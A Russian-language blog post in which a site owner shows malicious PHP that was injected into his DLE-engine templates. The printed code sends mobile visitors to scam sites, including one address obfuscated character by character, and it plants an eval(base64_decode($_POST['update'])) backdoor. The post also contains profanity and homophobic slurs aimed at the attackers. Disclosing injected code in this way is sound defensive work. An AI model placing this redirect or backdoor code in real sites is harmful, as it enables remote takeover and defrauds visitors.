Недавно на своих старых проектах я обнаружил заразу. Какой-то пидорас, нехороший человек, поломал движок DLE. И воткнул мне в код шаблонов и функция кучки кодов, которые перенаправляли людей пришедших ко мне с поисковых система на левые сайты с порнухой, вирусами и прочими радостями жизни.
Что интересно, основной интерес у них представляли юзеры мобильных девайсов, iPhone, Android, BlackBerry и пр.
Вот пример первого кода.
if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: https://yandex-google.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");
if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: https://statuses.ws/');
}
if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: https://ya-analytics.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));
В данном случае перенаправление шло на statuses.ws и ya-analytics.ws.
Следующий педик
if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") ||
strpos($_SERVER['HTTP_USER_AGENT'],"Android") ||
strpos($_SERVER['HTTP_USER_AGENT'],"webOS") ||
strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") ||
strpos($_SERVER['HTTP_USER_AGENT'],"iPod"))
header('Location: https://getinternet.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));
Отправлял людей на getinternet.ws.
А последний гнал трафик на up.cc.co.id/u/4590? по всей видимости какая-то траф партнерка.
if(preg_match('/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i',$_SERVER['HTTP_USER_AGENT']) && $_COOKIE["m_"] != 1)
{
@setcookie('m_', '1', time()+86400, '/');
@header("Location: "."h"."t"."t"."p".":"."/"."/"."u"."p"."."."c"."c"."."."c"."o"."."."i"."d"."/"."u"."/"."4"."5"."9"."0");
die();}
На всех этих сайтах: statuses.ws, ya-analytics.ws и getinternet.ws предлагалось установить себе несуществующие обновления для любых браузеров, почиститься от вирусов, которых у вас нет и отправить куда-нибудь СМС. В общем обычные мошенники. Я был настолько расстроен, что мои сайты так дешево наебнули, что ушел от движка DLE и продал свои старые сайты к чертям собачьим.
Купить
Написать комментарий